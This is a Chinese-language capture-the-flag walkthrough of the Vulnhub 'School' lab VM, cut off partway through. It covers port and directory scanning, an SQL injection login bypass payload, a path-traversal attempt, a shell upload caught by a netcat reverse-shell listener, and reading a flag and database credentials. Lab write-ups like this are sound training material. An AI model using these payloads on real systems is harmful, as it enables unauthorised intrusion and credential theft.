Vulnhub之School靶機詳細測試過程
阿新 • • 發佈:2022-11-29
School
識別目標主機IP地址
┌──(kali㉿kali)-[~/Vulnhub/School] └─$ sudo netdiscover -i eth1 Currently scanning: 172.16.70.0/16 | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:36:fe:47 2 120 PCS Systemtechnik GmbH 192.168.56.122 08:00:27:ac:cb:15 1 60 PCS Systemtechnik GmbH
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/School] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.122 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 22:05 EST Nmap scan report for localhost (192.168.56.122) Host is up (0.00019s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA) | 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA) |_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519) 23/tcp open telnet? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns, tn3270: |_ Verification Code: 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port23-TCP:V=7.92%I=7%D=11/28%Time=63857719%P=x86_64-pc-linux-gnu%r(NUL SF:L,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(GenericLines SF:,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(tn3270,1C,"Ve SF:rification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(GetRequest,1C,"Verif SF:ication\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(HTTPOptions,1C,"Verific SF:ation\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(RTSPRequest,1C,"Verificat SF:ion\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(RPCCheck,1C,"Verification\x SF:20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(DNSVersionBindReqTCP,1C,"Verific SF:ation\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(DNSStatusRequestTCP,1C,"V SF:erification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(Help,1C,"Verificati SF:on\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(SSLSessionReq,1C,"Verificati SF:on\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(TerminalServerCookie,1C,"Ver SF:ification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(TLSSessionReq,1C,"Ver SF:ification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(Kerberos,1C,"Verifica SF:tion\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(SMBProgNeg,1C,"Verificatio SF:n\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(X11Probe,1C,"Verification\x20 SF:Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(FourOhFourRequest,1C,"Verification SF:\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LPDString,1C,"Verification\x20 SF:Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LDAPSearchReq,1C,"Verification\x20 SF:Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LDAPBindReq,1C,"Verification\x20Co SF:de:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(SIPOptions,1C,"Verification\x20Code: SF:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LANDesk-RC,1C,"Verification\x20Code:\n\ SF:0\0\0\xee\x1e@\0\xe2\x1c")%r(TerminalServer,1C,"Verification\x20Code:\n SF:\0\0\0\xee\x1e@\0\xe2\x1c")%r(NCP,1C,"Verification\x20Code:\n\0\0\0\xee SF:\x1e@\0\xe2\x1c")%r(NotesRPC,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@ SF:\0\xe2\x1c")%r(JavaRMI,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2 SF:\x1c")%r(WMSRequest,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1 SF:c")%r(oracle-tns,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c") SF:%r(ms-sql-s,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(af SF:p,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c"); MAC Address: 08:00:27:AC:CB:15 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
NMAP掃描結果表明目標主機有3個開放埠:22(SSH)、23(Telnet)、80(HTTP)
Get Access
訪問23埠:
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ telnet 192.168.56.122
Trying 192.168.56.122...
Connected to 192.168.56.122.
Escape character is '^]'.
Verification Code:
�@�Connection closed by foreign host.
沒有建立連線,需要驗證碼?
瀏覽器訪問80埠,自動重定向到學生登入入口:
http://192.168.56.122/student_attendance/login.php
那會不會有管理員入口?
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ nikto -h http://192.168.56.122
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.122
+ Target Hostname: 192.168.56.122
+ Target Port: 80
+ Start Time: 2022-11-28 22:11:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /student_attendance
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-11-28 22:12:08 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto工具沒有給出更多有價值的資訊。
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.122
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/28 22:13:28 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220249 / 220561 (99.86%)===============================================================
2022/11/28 22:14:09 Finished
===============================================================
Gobuster工具沒有掃描目錄,繼續掃描以下有無相關的檔案?
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.122
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,html,php
[+] Timeout: 10s
===============================================================
2022/11/28 22:14:21 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 0] [--> /student_attendance]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101274 / 1102805 (99.86%)===============================================================
2022/11/28 22:18:25 Finished
===============================================================
目錄檔案掃描沒有得到任何有價值的結果,接下來只能是攻破使用者登入了,在用暴力破解前,看能不能利用SQL注入方法繞過認證。
在username輸入框中輸入: admin' or '1'='1'--
即可成功登入,而且是administrator
看URL,似乎有本地檔案包含漏洞,試一下:
http://192.168.56.122/student_attendance/index.php?page=home
試了以下:
http://192.168.56.122/student_attendance/index.php?page=../../../../../../etc/passwd
沒有成功得到檔案內容,那接下來看一下能不能上傳shell.php。沒有找到可以上傳檔案的位置,其實頁面原始碼有段註釋:
<script>
$('#manage_my_account').click(function(){
uni_modal("Manage Account","manage_user.php?id=1&mtype=own")
})
</script>
<style>
.collapse a{
text-indent:10px;
}
nav#sidebar{
/*background: url(assets/uploads/1604743980_shell.php) !important*/
}
</style>
<nav id="sidebar" class='mx-lt-5 bg-dark' >
<div class="sidebar-list">
<a href="index.php?page=home" class="nav-item nav-home"><span class='icon-field'><i class="fa fa-tachometer-alt "></i></span> Dashboard</a>
<a href="index.php?page=courses" class="nav-item nav-courses"><span class='icon-field'><i class="fa fa-th-list "></i></span> Course</a>
<a href="index.php?page=subjects" class="nav-item nav-subjects"><span class='icon-field'><i class="fa fa-book "></i></span> Subject</a>
<a href="index.php?page=class" class="nav-item nav-class"><span class='icon-field'><i class="fa fa-list-alt "></i></span> Class</a>
<a href="index.php?page=faculty" class="nav-item nav-faculty"><span class='icon-field'><i class="fa fa-user-tie "></i></span> Faculty</a>
<a href="index.php?page=students" class="nav-item nav-students"><span class='icon-field'><i class="fa fa-user-friends "></i></span> Student</a>
<a href="index.php?page=class_subject" class="nav-item nav-class_subject"><span class='icon-field'><i class="fa fa-user-friends "></i></span> Class per Subject</a>
<a href="index.php?page=check_attendance" class="nav-item nav-check_attendance"><span class='icon-field'><i class="fa fa-tasks "></i></span> Check Attendance</a>
<a href="index.php?page=attendance_record" class="nav-item nav-attendance_record"><span class='icon-field'><i class="fa fa-tasks "></i></span> Attendance Record</a>
<a href="index.php?page=attendance_report" class="nav-item nav-attendance_report"><span class='icon-field'><i class="fa fa-tasks "></i></span> Attendance Report</a>
<a href="index.php?page=users" class="nav-item nav-users"><span class='icon-field'><i class="fa fa-users "></i></span> Users</a>
<!-- <a href="index.php?page=site_settings" class="nav-item nav-site_settings"><span class='icon-field'><i class="fa fa-cogs text-danger"></i></span> System Settings</a> -->
</div>
assets/uploads/1604743980_shell.php,不過無法訪問,
另外一處註釋:index.php?page=site_settings
http://192.168.56.122/student_attendance/index.php?page=site_settings
發現可以上傳檔案
在目錄/uploads發現有個shell.php檔案
http://192.168.56.122/student_attendance/assets/uploads/
┌──(kali㉿kali)-[~/Vulnhub/School]
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.122] 58406
Linux school 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
04:04:16 up 1:21, 0 users, load average: 0.00, 0.03, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@school:/$ ls
ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
www-data@school:/$ cd /home
cd /home
www-data@school:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 7 2020 .
drwxr-xr-x 18 root root 4.0K Nov 3 2020 ..
drwxr-xr-x 2 fox fox 4.0K Nov 7 2020 fox
drwxr-xr-x 2 ppp ppp 4.0K Oct 10 2020 ppp
www-data@school:/home$ cd fox
cd fox
www-data@school:/home/fox$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 fox fox 4.0K Nov 7 2020 .
drwxr-xr-x 4 root root 4.0K Nov 7 2020 ..
lrwxrwxrwx 1 fox fox 9 Nov 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 fox fox 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 fox fox 3.5K Apr 18 2019 .bashrc
-rw-r--r-- 1 fox fox 807 Apr 18 2019 .profile
-rw-r--r-- 1 fox fox 33 Nov 7 2020 local.txt
www-data@school:/home/fox$ cat local.txt
cat local.txt
e4ed03b4852906b6cb716fc6ce0f9fd5
www-data@school:/home/fox$
www-data@school:/var/www/html/student_attendance$ cat db_connect.php
cat db_connect.php
<?php
$conn= new mysqli('localhost','fox','trallalleropititumpa','student_attendance_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@school:/var/www/html/student_attendance$
這個檔案中有資料庫連線使用者名稱和密碼,會不會也是系統的使用者名稱和密碼?發現不是。